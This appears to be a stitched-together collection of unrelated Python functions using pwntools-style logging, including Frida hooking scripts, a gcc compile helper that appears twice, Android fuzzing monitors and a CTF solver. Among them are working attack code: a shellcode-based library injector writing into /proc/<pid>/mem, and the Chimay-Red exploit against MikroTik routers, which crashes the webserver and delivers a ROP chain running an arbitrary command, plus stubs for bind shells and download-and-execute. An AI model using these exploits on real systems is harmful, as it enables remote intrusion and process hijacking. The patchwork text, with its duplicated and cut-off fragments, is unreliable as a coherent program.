def main(target_process):
    """Attach to ``target_process`` over frida-USB and install the configured hooks.

    When the config enables ``settings.write_results``, a fresh
    ``results/<argv[1]>/run_<n>/`` directory is created and passed to the hooks.
    Blocks on stdin afterwards so the injected scripts keep running.
    """
    with open(CONFIG_FILE_NAME) as j:
        config = json.load(j)

    try:
        session = frida.get_usb_device().attach(target_process)
    except frida.ServerNotRunningError:
        # log.error may itself raise (pwntools-style); the bare except
        # guarantees we still terminate with a failure status.
        try:
            log.error("Please start frida server first")
        except:
            sys.exit(-1)
    except frida.TimedOutError:
        try:
            log.error("Frida timeout...")
        except:
            sys.exit(-1)

    PATH = ""
    if config["settings"]["write_results"]:
        PATH = os.path.join(PATH, "results", sys.argv[1])
        if not os.path.exists(PATH):
            os.makedirs(PATH)
        # The number of existing run_* directories determines the next run id.
        previous_runs = sum(
            1 for entry in os.listdir(PATH)
            if os.path.isdir(os.path.join(PATH, entry))
        )
        PATH = os.path.join(PATH, "run_" + str(previous_runs))
        if not os.path.exists(PATH):
            os.makedirs(PATH)

    hook_classes(session, config, PATH)
    sys.stdin.read()
def _compile(code, werror, flags, libs):
    """Compile a C snippet into a shared object and load it with ctypes.

    Results are memoized twice: in-process via ``__cache`` (keyed on an md5 of
    the code and build options) and on disk via the digest-named ``.so`` in
    ``__tempdir``.

    Parameters:
        code:   C source text.
        werror: when truthy, adds ``-Werror`` so warnings fail the build.
        flags:  extra gcc flags (not modified; see note below).
        libs:   extra linker arguments appended after the source file.

    Returns a ``ctypes.CDLL`` handle; exits the process on compile failure.
    """
    digest = md5sumhex(code + str(werror) + str(flags) + str(libs))
    if digest in __cache:
        return __cache[digest]
    sopath = os.path.join(__tempdir, digest + '.so')
    try:
        if os.path.exists(sopath):
            # BUG FIX: was CDDL (undefined name); the resulting NameError was
            # silently swallowed by the bare except, so the on-disk cache
            # never actually worked.
            return CDLL(sopath)
    except OSError:
        # Narrowed from a bare except: only a failed dlopen/stat should fall
        # through to a rebuild.
        pass
    cpath = os.path.join(__tempdir, digest + '.c')
    with open(cpath, 'w') as f:
        f.write(code)
    # BUG FIX: use `flags + [...]` instead of `flags += [...]` so the
    # caller's list is not mutated as a side effect.
    flags = flags + ['-fPIC', '-shared', '-O3', '-march=native',
                     '-mtune=native', '-Wall']
    if werror:
        flags.append('-Werror')
    cmd = ['gcc'] + flags + ['-o', sopath, cpath] + libs
    p = Popen(cmd, stderr=PIPE)
    _, s = p.communicate()
    # Strip the temp-file path out of gcc's diagnostics.
    s = s.replace(cpath + ':', '').replace(cpath, '')
    # BUG FIX: `<>` is Python-2-only syntax; `!=` is valid in both 2 and 3.
    if p.returncode != 0:
        log.error('GCC error (%s):' % cpath)
        log.trace(s)
        sys.exit(p.returncode)
    elif s != '':
        log.warning('GCC warning (%s):' % cpath)
        log.trace(s)
    return CDLL(sopath)
def _compile(code, werror, flags, libs):
    """Compile a C snippet into a shared object and load it with ctypes.

    Memoized in-process via ``__cache`` and on disk via the digest-named
    ``.so`` file in ``__tempdir``.

    Parameters:
        code:   C source text.
        werror: when truthy, adds ``-Werror`` so warnings fail the build.
        flags:  extra gcc flags (not modified; see note below).
        libs:   extra linker arguments appended after the source file.

    Returns a ``ctypes.CDLL`` handle; exits the process on compile failure.
    """
    digest = md5sumhex(code + str(werror) + str(flags) + str(libs))
    if digest in __cache:
        return __cache[digest]
    sopath = os.path.join(__tempdir, digest + '.so')
    try:
        if os.path.exists(sopath):
            # BUG FIX: was CDDL (undefined name); the NameError was swallowed
            # by the bare except, defeating the on-disk cache.
            return CDLL(sopath)
    except OSError:
        # Narrowed from a bare except: only a failed dlopen/stat should fall
        # through to a rebuild.
        pass
    cpath = os.path.join(__tempdir, digest + '.c')
    with open(cpath, 'w') as f:
        f.write(code)
    # BUG FIX: avoid mutating the caller's `flags` list in place.
    flags = flags + ['-fPIC', '-shared', '-O3', '-march=native',
                     '-mtune=native', '-Wall']
    if werror:
        flags.append('-Werror')
    cmd = ['gcc'] + flags + ['-o', sopath, cpath] + libs
    p = Popen(cmd, stderr=PIPE)
    _, s = p.communicate()
    # Strip the temp-file path out of gcc's diagnostics.
    s = s.replace(cpath + ':', '').replace(cpath, '')
    # BUG FIX: `<>` is Python-2-only syntax; `!=` works in both 2 and 3.
    if p.returncode != 0:
        log.error('GCC error (%s):' % cpath)
        log.trace(s)
        sys.exit(p.returncode)
    elif s != '':
        log.warning('GCC warning (%s):' % cpath)
        log.trace(s)
    return CDLL(sopath)
def fastboot_reboot(self):
    """Reboot the device via fastboot and wait for it to come back up."""
    result = self.host_shell("/usr/bin/fastboot -s %s reboot" % self.serial)
    if "Finished. Total time:" not in result:
        log.error("fastboot reboot failed.")
    else:
        log.success("fastboot reboot succeed.")
        # Give the device time to finish rebooting before anything else runs.
        sleep(10)
def extract():
    """Extract RAAS map data from the unpacked assets into raas-data-auto.yaml."""
    os.makedirs(config.LAYER_DUMP_DIR, exist_ok=True)
    if not os.path.isdir(config.UNPACKED_ASSETS_DIR):
        log.error("Configured UNPACKED_ASSETS_DIR does not exist.\n"
                  "Make sure you run the unpack task first.")
    maps_directory = config.UNPACKED_ASSETS_DIR + "/Maps"
    with log.progress("-- Extracting Map") as progress:
        map_data = extract_map(maps_directory, progress)
    with log.progress("-- Writing RAAS data to file"), \
            open("raas-data-auto.yaml", "w") as output:
        output.write(yaml.dump(map_data, sort_keys=True, indent=4))
def tiles():
    """Tile every full-size .tga map via a dockerized GDAL, one job per map."""
    os.makedirs(config.TILE_MAP_DIR, exist_ok=True)
    if not os.path.isdir(config.FULLSIZE_MAP_DIR):
        log.error("Configured FULLSIZE_MAP_DIR does not exist.\n"
                  "Make sure you run the extract task first.")
    with ThreadPoolExecutor() as executor:
        for filename in os.listdir(config.FULLSIZE_MAP_DIR):
            # ignore non-tga files
            if not filename.endswith(".tga"):
                continue
            # remove extension
            base_name, _, _ = filename.rpartition(".tga")
            # We need to create a new user and group inside the Docker container,
            # otherwise the generated files will be owned by root on our host system,
            # which is annoying.
            # generate-map-tiles.sh takes care of that
            command = [
                "docker",
                "run",
                "--mount",
                f"type=bind,source={os.path.abspath(config.FULLSIZE_MAP_DIR)},target=/mnt/map-fullsize",
                "--mount",
                f"type=bind,source={os.path.abspath(config.TILE_MAP_DIR)},target=/mnt/map-tiles",
                "--mount",
                f"type=bind,source={os.getcwd()},target=/mnt/cwd",
                "osgeo/gdal",
                "sh",
                "/mnt/cwd/generate-map-tiles.sh",
                f"{os.getuid()}",
                f"{os.getgid()}",
                f"{base_name}",
            ]
            if context.log_level <= logging.DEBUG:
                # In debug mode, show the docker invocation and let it talk
                # directly to our stdout/stderr.
                pprint(command)
                sys.stdout.flush()
                stdout = sys.stdout
                stderr = sys.stderr
            else:
                stdout = subprocess.DEVNULL
                stderr = subprocess.DEVNULL
            executor.submit(extract_minimap, base_name, command, stdout, stderr)
def main():
    """Run the interactive menu loop until the user exits.

    Ctrl-C does not terminate the script; it prints a hint and restarts the
    menu. Any other exception is logged and the process exits with -1.
    """
    # BUG FIX: the original restarted itself by calling main() recursively
    # from the KeyboardInterrupt handler, growing the call stack on every
    # Ctrl-C. A plain loop restarts the menu with identical behavior.
    while True:
        try:
            menu()
            clear()
        except KeyboardInterrupt:
            clear()
            print(
                "\r\nYou pressed ctrl^C! If you want to exit, please type 'exit' or '5' to exit the script!\r\n"
            )
        except Exception as ex:
            # log.error may itself raise; either way we exit with -1.
            try:
                log.error(f"[-] {ex}")
                exit(-1)
            except:
                exit(-1)
def monitor(self):
    """Poll device health every 10 seconds forever, logging any failure."""
    while True:
        sleep(10)
        try:
            # Keep the device in a sane state (rooted, selinux disabled,
            # tombstone running) — killing tombstoned might miss some crashes.
            self.reset()
            self.check_fuzzer_status()
            self.check_logcat_status()
            self.check_restart_device_script_status()
            self.sync_log()
        except Exception as exc:
            message = "device %s exception: %s." % (self.serial, str(exc))
            print(message)
            print("please see the corresponding log.")
            log.error(message)
            log.error(traceback.format_exc())
def split_cmdline(cmdline):
    """Split a command line into arguments.

    Double-quoted spans become single arguments (quotes stripped); unquoted
    spans are split on single spaces. Returns the list of arguments, or
    ``None`` when a double quote is left unterminated.
    """
    # Small state machine over the characters of `cmdline`.
    WHITE_WORD = 0       # between arguments
    WORD_START = 1       # inside an unquoted argument
    QUOTATION_START = 2  # inside a double-quoted argument
    args = list()
    state = WHITE_WORD
    word_start = -1
    i = 0
    while i < len(cmdline):
        if state == WHITE_WORD:
            if cmdline[i] == "\"":
                state = QUOTATION_START
                word_start = i
            elif cmdline[i] != " ":
                # BUG FIX: previously ANY character (including a space)
                # started a word here, so leading or consecutive spaces were
                # folded into the next argument ("a  b" -> ["a", " b"]).
                state = WORD_START
                word_start = i
            i += 1
        elif state == QUOTATION_START:
            if cmdline[i] == "\"":
                new_arg = cmdline[word_start + 1:i]
                args.append(new_arg)
                state = WHITE_WORD
            i += 1
        elif state == WORD_START:
            if cmdline[i] == " ":
                new_arg = cmdline[word_start:i]
                args.append(new_arg)
                state = WHITE_WORD
            i += 1
    if state == QUOTATION_START:
        log.error("Wrong quotation in cmdline")
        return None
    elif state == WORD_START:
        # Flush the trailing argument.
        args.append(cmdline[word_start:])
    return args
def wikipedia_example():
    """Sanity-check RSA helpers against the worked example from Wikipedia.

    Uses p=61, q=53, n=3233, e=17, expecting d=2753 and that ciphertext 855
    decrypts back to 123. Mismatches are reported via log.error.
    """
    p = 61
    n = 3233
    # BUG FIX: was `n / p`, which is float division under Python 3 and would
    # pass a float q into the key derivation; floor division keeps it an int.
    q = n // p
    if q != 53:
        log.error('!!!')
    e = 17
    d = get_private_key_from_public(p, q, e)
    if d != 2753:
        log.error('!!!')
    c = 855
    m1 = pow(c, d, n)
    # BUG FIX: compared against the undefined name `m` (NameError at runtime).
    if m1 != 123:
        log.error('!!!')
    log.info(m1)
    log.info('yay!')
def do_madlib(io, answer=None):
    """Answer a single madlib round on the remote tube.

    When ``answer`` is provided we claim feasibility ('Y') and submit it at
    the fill-in prompt; otherwise we decline ('N'). Any response other than
    the expected message is reported via log.error.
    """
    io.recvuntil(FEASIBLE_PROMPT)
    if not answer:
        io.sendline('N')
        result = io.recvline(keepends=False)
        if result != CORRECT_MESSAGE:
            log.error(result)
        return
    io.sendline('Y')
    result = io.recvline(keepends=False)
    if result != FILL_IN:
        log.error(result)
        return
    io.recvuntil(': ')
    io.sendline(str(answer))
    result = io.recvline(keepends=False)
    if result != CORRECT_MESSAGE:
        log.error(result)
# Collect the union of keys seen across every parsed run.
for p in ps:
    all_keys += p.keys()
all_keys = list(set(all_keys))

# For each key, warn when a value recorded in one run also shows up in any
# of the other runs.
for key in all_keys:
    for index, current in enumerate(params):
        others = params[:index] + params[index + 1:]
        collected = [other[key] for other in others if other.get(key)]
        # Flatten the list-of-lists of values seen in the other runs.
        collected = [value for values in collected for value in values]
        if current.get(key):
            for x in current[key]:
                if x in collected:
                    log.warn("Same {} found in different runs".format(key))

if __name__ == '__main__':
    if len(sys.argv) != 3:
        # log.error may raise; the bare except makes sure we exit either way.
        try:
            log.error("Usage: %s <process name or PID> <function name>" % __file__)
        except:
            sys.exit(-1)
    main(sys.argv[1], sys.argv[2])
def ssl_download_and_exe(vector, *args):
    """Placeholder command handler: feature not shipped in this release."""
    message = ("Command: ssl_download_and_exe currently not implemented "
               "in this version. Coming in June!")
    log.error(message)
def get_functions(tree):
    """Build typed function descriptors for every FuncDecl node in the AST."""
    functions = []
    for node in tree:
        if not isinstance(node.type, pycparser.c_ast.FuncDecl):
            continue
        funct = get_type(node)
        funct.isfunct = True
        funct.name = node.name
        for param_node in node.type.args.params:
            param = get_type(param_node)
            param.name = param_node.name
            funct.params.append(param)
        functions.append(funct)
    return functions


def main(filename):
    """Parse ``filename`` against the fake libc headers and export each function."""
    ast = parse_file(filename, use_cpp=True, cpp_args="-I" + FAKE_LIBC)
    for funct in get_functions(ast.ext):
        export_function(funct)


if __name__ == '__main__':
    if len(sys.argv) != 2:
        # log.error may raise; the bare except makes sure we exit either way.
        try:
            log.error("Usage: %s <path_to_file>" % __file__)
        except:
            sys.exit(-1)
    main(sys.argv[1])
def main(target):
    """Attach to ``target`` over frida-USB and hook the configured functions.

    Reads the module list from config/modules.json and per-function hook specs
    from functions/, resolves each function's export address, injects a
    generated script for it, then blocks on stdin while the hooks run.
    Results go under results/<argv[1]>/run_<n>/ (via the global PATH).
    """
    global PATH
    log.info("Going to analyze {}".format(target))
    try:
        session = frida.get_usb_device().attach(target)
    except frida.ServerNotRunningError:
        # log.error may itself raise; the bare except guarantees we exit.
        try:
            log.error("Please start frida server first")
        except:
            sys.exit(-1)
    except frida.TimedOutError:
        try:
            log.error("Frida timeout...")
        except:
            sys.exit(-1)
    with open("config/modules.json") as j:
        MODULES = json.load(j)
    log.info("Will look at: {}".format(', '.join(MODULES)))
    PATH = "results/" + sys.argv[1] + "/"
    if not os.path.exists(PATH):
        os.makedirs(PATH)
    # Number the run directory after the existing run_* directories.
    runnr = len([x for x in os.listdir(PATH) if os.path.isdir(PATH + x)])
    PATH += "run_"
    PATH += str(runnr)
    PATH += "/"
    if not os.path.exists(PATH):
        os.makedirs(PATH)
    # Get only needed Modules
    modules = session.enumerate_modules()
    tmp = []
    for M in MODULES:
        tmp.append(modules[[x.name for x in modules].index(M)])
    modules = tmp
    functions = []
    for x in modules:
        functions += x.enumerate_exports()
    log.info("Found {} functions".format(len(functions)))
    # Which functions do I need to look at?
    for filename in os.listdir("functions/"):
        with open("functions/" + filename) as j:
            FUNCTIONS.append(json.load(j))
    lookup = [x["name"] for x in FUNCTIONS]
    log.info("Will look for: {}".format(', '.join(lookup)))
    for f in lookup:
        try:
            result = functions[[x.name for x in functions].index(f)]
        except ValueError:
            # BUG FIX: message previously rendered as "Function foonot found"
            # (missing space before "not").
            log.warn("Function " + f + " not found")
            continue
        log.info("Found {} in {} @ {}".format(result.name, result.module.name,
                                              hex(result.absolute_address)))
        script = session.create_script(
            genscript(FUNCTIONS[lookup.index(f)], result))
        script.on('message', on_message)
        script.load()
    log.info("Injected all needed scripts, now listening")
    sys.stdin.read()
def custom_shellcode(vector, *args):
    """Placeholder command handler: feature not shipped in this release."""
    message = ("Command: custom_shellcode currently not implemented "
               "in this version. Coming in June")
    log.error(message)
def bindshell(vector, *args):
    """Placeholder command handler: feature not shipped in this version."""
    message = "Command: bindshell currently not implemented in this version"
    log.error(message)
def __setitem__(self, item, value):
    # Reject (via log.error, which may raise) any field name that is not part
    # of the known FILE struct layout, then delegate the actual store to the
    # parent mapping class.
    if item not in self.FILE_struct:
        log.error('io_file: Unknown item %s' % item)
    super(IO_FILE_plus_struct, self).__setitem__(item, value)
def die(msg):
    # Report a fatal error and terminate the process with a non-zero status.
    log.error(msg)
    exit(1)
def dlinject(pid, lib_path, stopmethod="sigstop"):
    """Inject the shared library at ``lib_path`` into the running process ``pid``.

    Works by stopping the target (SIGSTOP or cgroup freezer), overwriting the
    code at its current RIP with a first-stage shellcode via /proc/<pid>/mem,
    and resuming it. Stage 1 mmaps and jumps to a second stage which restores
    the clobbered code and stack, calls ld.so's internal _dl_open() to load
    the library, restores all registers, and resumes at the original RIP.

    Parameters:
        pid:        target process id (requires ptrace-level privileges).
        lib_path:   path of the .so to load, as seen by the target.
        stopmethod: "sigstop", "cgroup_freeze", or anything else to skip
                    stopping (racy).
    """
    # Locate the dynamic loader mapping; we need its base to compute the
    # absolute address of _dl_open.
    with open(f"/proc/{pid}/maps") as maps_file:
        for line in maps_file.readlines():
            ld_path = line.split()[-1]
            if re.match(r".*/ld-.*\.so", ld_path):
                ld_base = int(line.split("-")[0], 16)
                break
        else:
            log.error("Couldn't find ld.so! (we need it for _dl_open)")

    log.info("ld.so found: " + repr(ld_path))
    log.info("ld.so base: " + hex(ld_base))

    dl_open_offset = lookup_elf_symbol(ld_path, "_dl_open")
    if not dl_open_offset:
        log.error("Unable to locate _dl_open symbol")

    dl_open_addr = ld_base + dl_open_offset
    log.info("_dl_open: " + hex(dl_open_addr))

    # Stop the target so its registers/stack don't move under us.
    if stopmethod == "sigstop":
        log.info("Sending SIGSTOP")
        os.kill(pid, signal.SIGSTOP)
        while True:
            with open(f"/proc/{pid}/stat") as stat_file:
                state = stat_file.read().split(" ")[2]
            if state in ["T", "t"]:
                break
            log.info("Waiting for process to stop...")
            time.sleep(0.1)
    elif stopmethod == "cgroup_freeze":
        freeze_dir = "/sys/fs/cgroup/freezer/dlinject_" + os.urandom(8).hex()
        os.mkdir(freeze_dir)
        with open(freeze_dir + "/tasks", "w") as task_file:
            task_file.write(str(pid))
        with open(freeze_dir + "/freezer.state", "w") as state_file:
            state_file.write("FROZEN\n")
        while True:
            with open(freeze_dir + "/freezer.state") as state_file:
                if state_file.read().strip() == "FROZEN":
                    break
            log.info("Waiting for process to freeze...")
            time.sleep(0.1)
    else:
        log.warn("We're not going to stop the process first!")

    # Current RIP/RSP are the last two fields of /proc/<pid>/syscall.
    with open(f"/proc/{pid}/syscall") as syscall_file:
        syscall_vals = syscall_file.read().split(" ")
    rip = int(syscall_vals[-1][2:], 16)
    rsp = int(syscall_vals[-2][2:], 16)

    log.info(f"RIP: {hex(rip)}")
    log.info(f"RSP: {hex(rsp)}")

    stage2_path = f"/tmp/stage2_{os.urandom(8).hex()}.bin"

    # Stage 1: save registers, mmap stage2 from disk as rwx, jump to it.
    shellcode = asm(fr"""
        // push all the things
        pushf
        push rax
        push rbx
        push rcx
        push rdx
        push rbp
        push rsi
        push rdi
        push r8
        push r9
        push r10
        push r11
        push r12
        push r13
        push r14
        push r15

        // Open stage2 file
        mov rax, 2          # SYS_OPEN
        lea rdi, path[rip]  # path
        xor rsi, rsi        # flags (O_RDONLY)
        xor rdx, rdx        # mode
        syscall

        mov r14, rax        # save the fd for later

        // mmap it
        mov rax, 9              # SYS_MMAP
        xor rdi, rdi            # addr
        mov rsi, {STAGE2_SIZE}  # len
        mov rdx, 0x7            # prot (rwx)
        mov r10, 0x2            # flags (MAP_PRIVATE)
        mov r8, r14             # fd
        xor r9, r9              # off
        syscall

        mov r15, rax            # save mmap addr

        // close the file
        mov rax, 3    # SYS_CLOSE
        mov rdi, r14  # fd
        syscall

        // delete the file (not exactly necessary)
        mov rax, 87         # SYS_UNLINK
        lea rdi, path[rip]  # path
        syscall

        // jump to stage2
        jmp r15

    path:
        .ascii "{stage2_path}\0"
    """)

    with open(f"/proc/{pid}/mem", "wb+") as mem:
        # back up the code we're about to overwrite
        mem.seek(rip)
        code_backup = mem.read(len(shellcode))

        # back up the part of the stack that the shellcode will clobber
        mem.seek(rsp - STACK_BACKUP_SIZE)
        stack_backup = mem.read(STACK_BACKUP_SIZE)

        # write the primary shellcode
        mem.seek(rip)
        mem.write(shellcode)

    log.info("Wrote first stage shellcode")

    # Stage 2: restore the original code and stack, call _dl_open to load the
    # library, restore all registers, and jump back to the original RIP.
    stage2 = asm(fr"""
        cld

        fxsave moar_regs[rip]

        // Open /proc/self/mem
        mov rax, 2                   # SYS_OPEN
        lea rdi, proc_self_mem[rip]  # path
        mov rsi, 2                   # flags (O_RDWR)
        xor rdx, rdx                 # mode
        syscall

        mov r15, rax  # save the fd for later

        // seek to code
        mov rax, 8      # SYS_LSEEK
        mov rdi, r15    # fd
        mov rsi, {rip}  # offset
        xor rdx, rdx    # whence (SEEK_SET)
        syscall

        // restore code
        mov rax, 1                   # SYS_WRITE
        mov rdi, r15                 # fd
        lea rsi, old_code[rip]       # buf
        mov rdx, {len(code_backup)}  # count
        syscall

        // close /proc/self/mem
        mov rax, 3    # SYS_CLOSE
        mov rdi, r15  # fd
        syscall

        // move pushed regs to our new stack
        lea rdi, new_stack_base[rip-{STACK_BACKUP_SIZE}]
        mov rsi, {rsp-STACK_BACKUP_SIZE}
        mov rcx, {STACK_BACKUP_SIZE}
        rep movsb

        // restore original stack
        mov rdi, {rsp-STACK_BACKUP_SIZE}
        lea rsi, old_stack[rip]
        mov rcx, {STACK_BACKUP_SIZE}
        rep movsb

        lea rsp, new_stack_base[rip-{STACK_BACKUP_SIZE}]

        // call _dl_open (https://github.com/lattera/glibc/blob/895ef79e04a953cac1493863bcae29ad85657ee1/elf/dl-open.c#L529)
        lea rdi, lib_path[rip]  # file
        mov rsi, 2              # mode (RTLD_NOW)
        xor rcx, rcx            # nsid (LM_ID_BASE) (could maybe use LM_ID_NEWLM (-1))
        mov rax, {dl_open_addr}
        call rax

        fxrstor moar_regs[rip]
        pop r15
        pop r14
        pop r13
        pop r12
        pop r11
        pop r10
        pop r9
        pop r8
        pop rdi
        pop rsi
        pop rbp
        pop rdx
        pop rcx
        // BUG FIX: was `pop rdx` a second time, which clobbered rdx with the
        // saved rbx value and left rbx unrestored. Stage 1 pushes
        // rax,rbx,rcx,rdx,... so the reverse pop order here must be
        // ...,rdx,rcx,rbx,rax.
        pop rbx
        pop rax
        popf

        mov rsp, {rsp}
        jmp old_rip[rip]

    old_rip:
        .quad {rip}

    old_code:
        .byte {",".join(map(str, code_backup))}

    old_stack:
        .byte {",".join(map(str, stack_backup))}

        .align 16
    moar_regs:
        .space 512

    lib_path:
        .ascii "{lib_path}\0"

    proc_self_mem:
        .ascii "/proc/self/mem\0"

    new_stack:
        .balign 0x8000

    new_stack_base:
    """)

    with open(stage2_path, "wb") as stage2_file:
        # world-writable so the (possibly differently-privileged) target can
        # open and unlink it
        os.chmod(stage2_path, 0o666)
        stage2_file.write(stage2)

    log.info(f"Wrote stage2 to {repr(stage2_path)}")

    # Resume the target; it immediately runs stage 1 at its old RIP.
    if stopmethod == "sigstop":
        log.info("Continuing process...")
        os.kill(pid, signal.SIGCONT)
    elif stopmethod == "cgroup_freeze":
        log.info("Thawing process...")
        with open(freeze_dir + "/freezer.state", "w") as state_file:
            state_file.write("THAWED\n")
        # put the task back in the root cgroup
        with open("/sys/fs/cgroup/freezer/tasks", "w") as task_file:
            task_file.write(str(pid))
        # cleanup
        os.rmdir(freeze_dir)

    log.success("Done!")
def log_error(self, msg):
    # Log an error with the concrete class name as a prefix for context.
    log.error('{}: {}'.format(self._class_name(), msg))
# Resolve each requested function among the enumerated exports and inject a
# generated hook script for it; unknown names are skipped with a warning.
for f in lookup:
    try:
        result = functions[[x.name for x in functions].index(f)]
    except ValueError:
        # BUG FIX: message previously rendered as "Function foonot found"
        # (missing space before "not").
        log.warn("Function " + f + " not found")
        continue
    log.info("Found {} in {} @ {}".format(result.name, result.module.name,
                                          hex(result.absolute_address)))
    script = session.create_script(
        genscript(FUNCTIONS[lookup.index(f)], result))
    script.on('message', on_message)
    script.load()

log.info("Injected all needed scripts, now listening")
# Block so the injected scripts keep running until stdin is closed.
sys.stdin.read()

if __name__ == '__main__':
    if len(sys.argv) != 2:
        # log.error may raise; the bare except makes sure we exit either way.
        try:
            log.error("Usage: %s <process name or PID>" % __file__)
        except:
            sys.exit(-1)
    # A numeric argument is treated as a PID, anything else as a process name.
    try:
        target_process = int(sys.argv[1])
    except ValueError:
        target_process = sys.argv[1]
    main(target_process)
def write_devel_read_userfile(vector, *args):
    """Placeholder command handler: feature not shipped in this release."""
    message = ("Command: write_devel_read_userfile currently not implemented "
               "in this version. Coming in June!")
    log.error(message)
if ARGS.vector not in VECTORS: raise RuntimeError("vector: {} is not available".format( ARGS.vector)) if ARGS.vector.startswith("build"): if not ARGS.binary: raise RuntimeError( "build vector specified without --binary filepath") if not os.path.isfile(ARGS.binary): raise RuntimeError("supplied binary could not be found!\n") # ARCHITECTURE ARG CHECKING if not ARGS.architecture: log.warning("No architecture specified, defaulting to ({})".format( SUPPORTED_ARCHS[0])) elif ARGS.architecture not in SUPPORTED_ARCHS: log.error("Unsupported architecture specified") # TARGET NAMESPACE SETTING, YEA I USED A GLOBAL NAMESPACE, SUE ME for argname, value in vars(ARGS).items(): setattr(TARGET, argname, value) except RuntimeError as exc: raise PrintHelpException(exc) # PROFILING DETECTION if PROFILING: raise SystemExit(profile_main()) else: raise SystemExit(main()) else: # Chimay-Red is not a library! raise ImportError
def throw_v6(vector, command):
    """Run the Chimay-Red v6.x exploit against TARGET with the chosen vector.

    Builds a ROP chain for ``command``, crashes the target webserver once for
    reliability, then uses two overlapping POST requests to overwrite a thread
    stack and deliver the chain.

    Parameters:
        vector:  "mikrodb" (offsets from the local database), "leak"
                 (pointer-leak analysis only), "build" or "default"
                 (build the chain from the local binary).
        command: shell command to embed in the ROP chain.

    Returns True on completion; log.error aborts on any precondition failure.
    """
    threads = 2
    connections = list()
    ropper = MikroROP(context.binary, command=command)

    if not connectable(TARGET.rhost):
        log.error("Cannot communicate with target, you sure it's up?")
    TARGET.version = get_remote_version()
    if not exploitable(TARGET.version):
        log.error("{} is not exploitable!".format(TARGET.rhost))

    if not TARGET.architecture:
        try:
            # attempt to remotely retrieve the target architecture if the
            # target's location is available in the route table
            for route in get_system_routes():
                if check_cidr_overlap(
                        route, "{}.0/24".format(".".join(
                            TARGET.rhost.split(".")[:-1]))):
                    log.success(
                        "Found target in route table range: {}/24".format(
                            route))
                    TARGET.architecture = get_remote_architecture(TARGET.rhost)
                    break
        except GeneratorExit:
            TARGET.architecture = "x86"
            log.warning(
                "Cannot determine remote target architecture, no route table match"
            )
            log.warning("\tTarget Architecture: [{}] (Fallback)".format(
                TARGET.architecture))
        except (StopIteration, KeyboardInterrupt):
            TARGET.architecture = "x86"
            log.warning("Skipped architecture detection as requested")
            log.warning("\tTarget Architecture: [{}] (Fallback)".format(
                TARGET.architecture))

    log.info("Beginning chimay-red [throw_v6] with specs:"
             "\nTarget: '{target: >5}'"
             "\nCommand: '{command: >5}'"
             "\nVector: '{vector: >5}'"
             "\nVersion: '{version: >5}'"
             "\nArchitecture: '{architecture}'"
             "".format(target=TARGET.rhost,
                       command=command,
                       vector=vector,
                       version=TARGET.version,
                       architecture=TARGET.architecture))

    try:
        if vector == "mikrodb":
            arch_offsets = offsets = None
            # instantiate MikroDB offset lookup helper
            lookuper = mikrodb.MikroDb("lite://mikro.db")

            if not TARGET.version:
                # BUG FIX: typo "determinte" in the error message.
                log.error(
                    "Could not determine remote version, cannot proceed for current vector."
                )
            # fetch offsets from database given architecture and version
            if not lookuper.get("www"):
                log.error(
                    "Could not locate www table in database, please build database."
                )
            else:
                arch_offsets = lookuper["www"].get(TARGET.architecture)
            if not arch_offsets:
                log.error(
                    "Could not locate architecture: [{}] in database, please rebuild the database."
                    .format(TARGET.architecture))
            if not arch_offsets.get(TARGET.version):
                log.error(
                    "Could not locate version: [{}] in database, please rebuild the database."
                    .format(TARGET.version))
            if not arch_offsets[TARGET.version].get("offsets"):
                log.error(
                    "Could not locate offsets for architecture: [{}] and version: [{}] in database, please"
                    " rebuild the database.".format(TARGET.architecture,
                                                    TARGET.version))
            else:
                offsets = arch_offsets[TARGET.version]["offsets"]
                # Quick lil conversion to attribute access
                offsets = namedtuple("offsets", sorted(offsets))(**offsets)
            ropper.build_ropchain(offsets=offsets)
        elif vector == "leak":
            log.info("Attempting to leak pointers from remote process map...")
            # instantiate memory leaker helper object class
            leaker = MikroLeaker(context)
            leaker.leak()
            leaker.analyze_leaks()
        elif vector in ("build", "default"):
            # BUG FIX: was `vector == "build" or "default"`, which is always
            # truthy (non-empty string literal), so every unrecognized vector
            # silently fell into this branch and the else below was
            # unreachable.
            ropper.build_ropchain()
        else:
            log.error("developer error occured selecting the proper vector!")

        log.info("Crashing target initially for reliability sake...")
        while not Command(command="do_crash"):
            continue

        with log.progress(
                "Successfully crashed! Target webserver will be back up in"
        ) as progress:
            for tick in reversed(range(1, 4)):
                progress.status("{0} seconds...".format(tick))
                time.sleep(1)
            progress.success("UP")

        log.info("Allocating {0} threads for main payload...".format(threads))
        # Plain loops instead of side-effect list comprehensions.
        for _ in range(threads):
            connections.append(create_socket(TARGET.rhost, TARGET.rport))

        log.info(
            "POST content_length header on thread0 to overwrite thread1_stacksize + skip_size + payload_size"
        )
        connections[0].send(
            craft_post_header(length=0x20000 + 0x1000 + len(ropper.chain) + 1))
        time.sleep(0.5)

        log.info(
            "Incrementing POST read() data buffer pointer on thread0 to overwrite return address on thread1"
        )
        connections[0].send(b'\x90' * (((0x1000 - 0x10) & 0xFFFFFF0) -
                                       (context.bits >> 3)))
        time.sleep(0.5)

        log.info(
            "POST content_length header on thread1 to allocate maximum space for payload: ({}) bytes"
            .format(len(ropper.chain) + 1))
        connections[1].send(craft_post_header(length=len(ropper.chain) + 1))
        time.sleep(0.5)

        log.info("Sending ROP payload...")
        connections[0].send(ropper.chain)
        time.sleep(0.5)

        log.info("Closing connections sequentially to trigger execution...")
        for connection in connections:
            connection.close()
    except KeyboardInterrupt:
        raise SystemExit(log.warning("SIGINT received, exiting gracefully..."))
    except Exception:
        raise

    return True